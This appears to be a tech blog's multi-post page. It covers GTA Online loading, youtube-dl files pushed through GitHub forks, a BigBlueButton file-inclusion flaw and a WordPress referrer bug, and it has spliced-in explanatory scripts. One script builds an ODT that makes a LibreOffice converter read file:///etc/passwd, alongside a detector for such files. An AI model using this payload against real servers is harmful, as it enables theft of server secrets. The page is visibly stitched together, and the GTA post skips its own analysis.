GTA Online. Infamous for its slow loading times. Having picked up the game again to finish some of the newer heists I was shocked (/s) to discover that it still loads just as slowly as the day it was released 7 years ago.

It was time. Time to get to the bottom of this.

First I wanted to check if someone had already solved this problem. Most of the results I found pointed towards anecdata about how the game is so sophisticated that it needs to load so long, stories on how the p2p network architecture is rubbish (not saying that it isn’t), some elaborate ways of loading into story mode and a solo session after that and a couple of mods that allowed skipping the startup R* logo video. Some more reading told me we could save a whopping 10-30 seconds with these combined!

Source: t0st

Rockstar, you had one simple job and you fucked up! This fix would have cost about one hour of work, but you decided to release an unfinished game at a time when the available hardware wasn’t even capable of running it with maximum details. And now you wonder why people are mad at you. *facepalm*

2021-02-23 @ 10:47: Food for your brain Coding | Fun

Are you tired? Do you sit at home alone in your home office and are not motivated in any way to do your work? Do you feel how you’re getting more stupid every day you sit at home, watch TV and face no challenge at all? Well, you don’t have to anymore. Thanks to this scientific formula, formulated by scientists, you’ll get what your brain wants.

Some days ago GitHub received a DMCA complaint from the RIAA to remove youtube-dl due to copyright violations. The youtube-dl website is still online and I mirrored the files to my website just in case.

Now, due to a bug in GitHub, known for a long time, it’s possible to add files to other users’ repositories without touching any of their branches: GitHub keeps the objects of a whole fork network in one store, so a commit pushed to a fork becomes reachable under the upstream repository’s URL. You can’t change an existing hash, but adding files creates a new commit with a new hash, and you can link to that exact hash in order to get the files. Very neat!

So, long story short, that’s exactly what someone did.
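The following script is an added example, not part of the original post and not GitHub tooling: it simulates the fork-network behaviour locally with two plain git repositories. A commit made in the “fork” is copied into the “upstream” object store without any upstream branch pointing at it, which is exactly the state that makes a hash servable under someone else’s repository URL. The check worth remembering is the second function: whether the owner’s branch actually contains the commit, not whether the object can be fetched. Repository names, paths and the demo identity are made up; git must be on PATH.

```python
import os
import subprocess
import tempfile

# Fixed identity so the demo commits succeed on a machine without git config.
ENV = dict(os.environ,
           GIT_AUTHOR_NAME="demo", GIT_AUTHOR_EMAIL="demo@example.invalid",
           GIT_COMMITTER_NAME="demo", GIT_COMMITTER_EMAIL="demo@example.invalid")


def git(*args, cwd=None):
    """Run one git command; return (exit status, stripped stdout)."""
    p = subprocess.run(["git", *args], cwd=cwd, env=ENV,
                       capture_output=True, text=True)
    return p.returncode, p.stdout.strip()


def object_present(repo, sha):
    """What '<repo>/commit/<sha>' on the web answers: is the object in the store?"""
    return git("cat-file", "-e", sha + "^{commit}", cwd=repo)[0] == 0


def reachable_from_branch(repo, sha, branch="main"):
    """What actually establishes provenance: does the owner's branch contain it?"""
    return git("merge-base", "--is-ancestor", sha, branch, cwd=repo)[0] == 0


def commit_file(repo, name, content, message):
    """Write one file and commit it; return the new commit hash."""
    with open(os.path.join(repo, name), "w") as f:
        f.write(content)
    git("add", name, cwd=repo)
    git("commit", "-q", "-m", message, cwd=repo)
    return git("rev-parse", "HEAD", cwd=repo)[1]


def build_demo():
    """Create 'upstream', a 'fork' with an injected file, and copy the fork's
    objects into upstream's store without touching any upstream branch
    (the shared object store of a GitHub fork network, simulated locally)."""
    work = tempfile.mkdtemp(prefix="forkdemo-")
    upstream = os.path.join(work, "upstream")
    fork = os.path.join(work, "fork")

    git("init", "-q", upstream)
    git("symbolic-ref", "HEAD", "refs/heads/main", cwd=upstream)
    upstream_sha = commit_file(upstream, "README", "original\n", "initial")

    git("clone", "-q", upstream, fork)
    fork_sha = commit_file(fork, "injected.txt", "not from upstream\n", "add file")

    # Fetch the fork's commit into upstream under a temporary ref, then delete
    # the ref: the objects stay in the store, but no upstream branch moved.
    git("fetch", "-q", fork, "main:refs/tmp/fork", cwd=upstream)
    git("update-ref", "-d", "refs/tmp/fork", cwd=upstream)

    return {"upstream": upstream, "upstream_sha": upstream_sha, "fork_sha": fork_sha}


if __name__ == "__main__":
    d = build_demo()
    for label, sha in (("upstream commit", d["upstream_sha"]),
                       ("fork commit    ", d["fork_sha"])):
        print(f"{label} {sha[:12]}: in object store={object_present(d['upstream'], sha)}, "
              f"on upstream main={reachable_from_branch(d['upstream'], sha)}")
```

Run stand-alone it prints that both commits sit in upstream’s object store while only the owner’s own commit is on `main`. The same distinction applies to a real GitHub URL: `git branch --contains <sha>` or `git merge-base --is-ancestor <sha> <branch>` on a clone tells you whether the repository owner ever published that commit; the web page existing does not.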

BigBlueButton is a free web-based video conferencing software that lately got quite popular, largely due to Covid-19. Earlier this year I did a brief check on its security which led to an article on Golem.de (German). I want to share the most significant findings here.

BigBlueButton has a feature that lets a presenter upload a presentation in a wide variety of file formats that then gets displayed in the web application. This looked like a huge attack surface. The conversion for many file formats is done with Libreoffice on the server. Looking for ways to exploit server-side Libreoffice rendering I found a blog post by Bret Buerhaus that discussed a number of ways of exploiting such setups.

One of the methods described there is a feature in Opendocument Text (ODT) files that allows embedding a file from an external URL in a text section. This can be a web URL like https or a file URL and include a local file.

This directly worked in BigBlueButton. An ODT file that referenced a local file would display that local file. This allows displaying any file that the user running the BigBlueButton service could access on the server. A possible way to exploit this is to exfiltrate the configuration file that contains the API secret key, which then allows basically controlling the BigBlueButton instance. I have a video showing the exploit here.

Source: Hanno’s Blog

I never understood why you would need to include external files or web pages in such a document, and I can’t even think of a use case where this is a great idea, unless you want to fuck things up.

Here’s the PoC, in case you’re interested.
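To show the mechanism without depending on an external PoC, here is an added example (mine, not Hanno’s or BigBlueButton’s code): it builds a minimal but valid ODT in memory containing the `text:section-source` element from the ODF spec, which makes LibreOffice pull the referenced target into the section when the document is rendered, and beside it the pre-conversion check a server accepting uploads should run. Element names and namespaces are the real ODF ones; the document text and the set of elements treated as “loaded at render time” are my assumptions.

```python
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

MIME = "application/vnd.oasis.opendocument.text"
NS_XLINK = "http://www.w3.org/1999/xlink"
XLINK_HREF = "{%s}href" % NS_XLINK

MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" manifest:version="1.2">
 <manifest:file-entry manifest:full-path="/" manifest:media-type="%s"/>
 <manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>
</manifest:manifest>
""" % MIME

# content.xml skeleton; %s is where the (optional) linked section goes.
CONTENT = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content
  xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
  xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
  xmlns:xlink="http://www.w3.org/1999/xlink" office:version="1.2">
 <office:body><office:text>
  <text:p>Constructed sample document. Nothing to see here.</text:p>
  %s
 </office:text></office:body>
</office:document-content>
"""

# Elements whose xlink:href LibreOffice resolves while rendering/converting.
# text:a hyperlinks are deliberately not in the list: they are not fetched.
LOADED_AT_RENDER = {"section-source", "image", "object", "object-ole", "plugin"}


def linked_section(href):
    """The ODF feature from the post: a text:section whose content is taken
    from an external source (file:///..., https://..., or a relative path)."""
    return ('<text:section text:name="Sect1">'
            '<text:section-source xlink:type="simple" xlink:href="%s"/>'
            '<text:p>placeholder, replaced by the linked content</text:p>'
            '</text:section>' % href)


def make_odt(section_xml=""):
    """Build a minimal .odt: a zip whose first entry is an uncompressed mimetype."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(zipfile.ZipInfo("mimetype"), MIME, compress_type=zipfile.ZIP_STORED)
        z.writestr("META-INF/manifest.xml", MANIFEST, compress_type=zipfile.ZIP_DEFLATED)
        z.writestr("content.xml", CONTENT % section_xml, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def external_links(odt_bytes):
    """Pre-conversion check: hrefs on render-time elements that point outside
    the package (absolute URL or a path escaping it). Returns [(element, href)]."""
    found = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as z:
        root = ET.fromstring(z.read("content.xml"))
    for el in root.iter():
        href = el.get(XLINK_HREF)
        local = el.tag.rsplit("}", 1)[-1]
        if href is None or local not in LOADED_AT_RENDER:
            continue
        escapes = (urlsplit(href).scheme != "" or href.startswith("/")
                   or posixpath.normpath(href).startswith(".."))
        if escapes:
            found.append((local, href))
    return found


def safe_to_convert(odt_bytes):
    """True only if nothing in the document would make the converter read
    a file or URL of the uploader's choosing."""
    return not external_links(odt_bytes)


if __name__ == "__main__":
    doc = make_odt(linked_section("file:///etc/passwd"))
    print(len(doc), "bytes; external links:", external_links(doc))
```

Rejecting such uploads is only the first layer: the check reads `content.xml` alone, so the conversion process itself still belongs in a sandbox with no access to the service’s configuration files and no outbound network, in case a format the scanner does not parse carries the same kind of reference.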

“My problem with contact tracing apps is that they have absolutely no value,” Bruce Schneier, a privacy expert and fellow at the Berkman Klein Center for Internet & Society at Harvard University, told BuzzFeed News. “I’m not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? … This is just something governments want to do for the hell of it. To me, it’s just techies doing techie things because they don’t know what else to do.”

Source: Schneier on Security

You enter a cave. At the end of a dark corridor, you encounter a pair of sealed chambers. Inside each chamber is an all-knowing wizard. The prophecy says that with these oracles’ help, you can learn the answers to unanswerable problems. But there’s a catch: The oracles don’t always tell the truth. And though they cannot communicate with each other, their seemingly random responses to your questions are actually connected by the very fabric of the universe. To get the answer you seek, you must first devise… the questions.

Computer scientists are buzzing about a new mathematical proof that proposes a quantum-entangled system sort of like the one described above. It seems to disprove a 44-year-old conjecture and details a theoretical machine capable of solving the famous halting problem, which says a computer cannot determine whether it will ever be able to solve a problem it’s currently trying to solve.

The 150-page proof, titled simply “MIP*=RE,” deals in the esoteric subject of computational complexity. If it holds under scrutiny, it demonstrates a profound connection between quantum physics, computation, and mathematics. It shows that a theoretical class of computing devices—a verifier interrogating the quantum-entangled oracles—can check some of the most complex computer problems imaginable. And it has important implications for quantum physicists.

Source: Gizmodo

Real-time data and analytics and machine learning and AI creates unpreparedness by corporations and Big Tech companies.

Source: cyberscoop

That’s what the bot said, and he seems smarter than the people who use him.

2019-08-09 @ 08:11: Agile software development Coding

… means to fiddle around with something until it fits the use case. Documentation “will be done later” and structured programming “just happens by accident”.

EverCrypt—developed and verified by the Project Everest team—offers the same features, convenience, and performance as popular existing cryptographic libraries without the bugs that leave protocols and applications vulnerable. Usable by verified and unverified clients alike, EverCrypt emphasizes both multiplatform support and high performance. We accomplish this by producing both platform-agnostic C code and optimized assembly code for specific hardware targets through the combination of two components of Project Everest: the HACL* cryptographic library developed jointly between Inria and Microsoft Research and the Vale-Crypto library of assembly primitives developed collectively between Microsoft Research and Carnegie Mellon University.

By Jonathan Protzenko, Researcher; Bryan Parno, Associate Professor, Carnegie Mellon University

The verification process is likely more complex than the code itself. Anyway, this is one great step. Read the full article over at Microsoft.

2019-03-15 @ 10:52: Referrer hell Browsers | PHP | Security

Relying on the HTTP referrer is bad. Everyone knows this, but at least the WordPress developers seem to ignore the fact. Also, I never understood why PHP keeps writing HTTP_REFERER with a single “R” in the middle. The English word is “referrer”, but the header was misspelled “Referer” in the original HTTP specification, and the CGI variable name simply follows the header, so PHP is stuck with it.

Anyway, instead of storing the current URL in $_SESSION['HTTP_REFERRER'] as one would normally do, WordPress falls back to $_SERVER['HTTP_REFERER'] (wp_get_referer() prefers a _wp_http_referer request parameter when a form supplies one, and uses the header otherwise).

The PHP documentation is very clear that this referrer is not to be trusted:

‘HTTP_REFERER’
The address of the page (if any) which referred the user agent to the current page. This is set by the user agent. Not all user agents will set this, and some provide the ability to modify HTTP_REFERER as a feature. In short, it cannot really be trusted.

Imagine the following case: you run WordPress from a sub-folder of the root directory and the referrer is – for whatever reason – set to the web root of the server, rather than the web root of your WordPress installation. In fact this is the case on my development machine; I explain the reason below.

Now, when you try to delete/recycle a post/page/whatever WordPress checks the referrer in post.php in line 55:

$sendback = wp_get_referer();
if ( ! $sendback ||
	 strpos( $sendback, 'post.php' ) !== false ||
	 strpos( $sendback, 'post-new.php' ) !== false ) {
	if ( 'attachment' == $post_type ) {
		$sendback = admin_url( 'upload.php' );
	} else {
		$sendback = admin_url( 'edit.php' );
		if ( ! empty( $post_type ) ) {
			$sendback = add_query_arg( 'post_type', $post_type, $sendback );
		}
	}
} else {
	$sendback = remove_query_arg( array( 'trashed', 'untrashed', 'deleted', 'ids' ), $sendback );
}

The code above is taken from WordPress 5.1.1.

So, what happens when the referrer returned by wp_get_referer() contains the wrong URL? You get redirected anywhere but the correct location. The only way to somehow fix this without messing with the code is to stop the browser from sending a referrer at all: wp_get_referer() then returns false and the fallback admin_url( 'edit.php' ) kicks in. You still won’t land on the page you came from, but at least you remain inside the WordPress backend.

Why is the referrer wrong?

As stated above, the referrer is set by the user agent (e.g. the browser). It seems my Waterfox does not send the referrer the way WordPress expects; the problem does not occur in Firefox or Opera. Looking at about:config in Waterfox I found the setting “network.http.referer.trimmingPolicy” set to “2”. According to this page, that value trims the referrer to its origin (scheme, host and port), dropping the path and any query string.

Setting it back to its default solved the issue, but that makes the browser send the full referrer, which is not desirable for privacy reasons. On the other hand the trimmed referrer did not break any other pages besides the WordPress backend, so I guess it’s time for the WordPress developers to fix their code.
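To make the failure concrete, here is the redirect logic from post.php ported to Python as an added example (it is not WordPress code; the install URL is assumed, and trim_referer mimics the three trimmingPolicy values instead of involving a browser). It shows what the quoted code does with an origin-only referrer, and the check a server should apply in its place: use the referrer only when it points inside this install’s wp-admin, otherwise take the fallback.

```python
import posixpath
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Assumed installation: WordPress in a sub-folder of the web root.
ADMIN_URL = "https://example.com/blog/wp-admin/"


def trim_referer(url, policy):
    """Mimics network.http.referer.trimmingPolicy in Firefox/Waterfox:
    0 = send the full URL, 1 = drop the query string, 2 = origin only."""
    p = urlsplit(url)
    if policy == 0:
        return url
    if policy == 1:
        return urlunsplit((p.scheme, p.netloc, p.path, "", ""))
    if policy == 2:
        return urlunsplit((p.scheme, p.netloc, "/", "", ""))
    raise ValueError("unknown trimming policy %r" % policy)


def remove_query_arg(url, keys):
    """Python stand-in for WordPress' remove_query_arg()."""
    p = urlsplit(url)
    q = [(k, v) for k, v in parse_qsl(p.query, keep_blank_values=True) if k not in keys]
    return urlunsplit((p.scheme, p.netloc, p.path, urlencode(q), p.fragment))


def sendback_original(referer, post_type="post"):
    """The post.php logic quoted above, branch for branch."""
    if not referer or "post.php" in referer or "post-new.php" in referer:
        if post_type == "attachment":
            return ADMIN_URL + "upload.php"
        sendback = ADMIN_URL + "edit.php"
        if post_type:
            sendback += "?post_type=" + post_type
        return sendback
    return remove_query_arg(referer, {"trashed", "untrashed", "deleted", "ids"})


def inside_admin(url):
    """True if url has the same origin as ADMIN_URL and its normalised path
    lies under the wp-admin directory (assumed check, not WordPress code)."""
    want, got = urlsplit(ADMIN_URL), urlsplit(url)
    if (got.scheme, got.netloc) != (want.scheme, want.netloc):
        return False
    path = posixpath.normpath(got.path or "/")   # folds ../ before comparing
    return path == want.path.rstrip("/") or path.startswith(want.path)


def sendback_hardened(referer, post_type="post"):
    """Same redirect, but a referrer outside this install's wp-admin is ignored,
    so the user can never be sent out of the backend."""
    if referer and not inside_admin(referer):
        referer = ""
    return sendback_original(referer, post_type)


if __name__ == "__main__":
    full = "https://example.com/blog/wp-admin/edit.php?post_type=page&trashed=1&ids=7"
    for policy in (0, 1, 2):
        ref = trim_referer(full, policy)
        print(f"policy {policy}: referer={ref}")
        print(f"   original -> {sendback_original(ref, 'page')}")
        print(f"   hardened -> {sendback_hardened(ref, 'page')}")
```

With policy 2 the original logic sends the user to https://example.com/, the web root outside the WordPress folder, because the referrer is non-empty and contains neither post.php nor post-new.php; the hardened variant discards it and lands on edit.php instead. The same origin-and-path check also neutralises a hand-crafted referrer such as one containing ../ segments.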

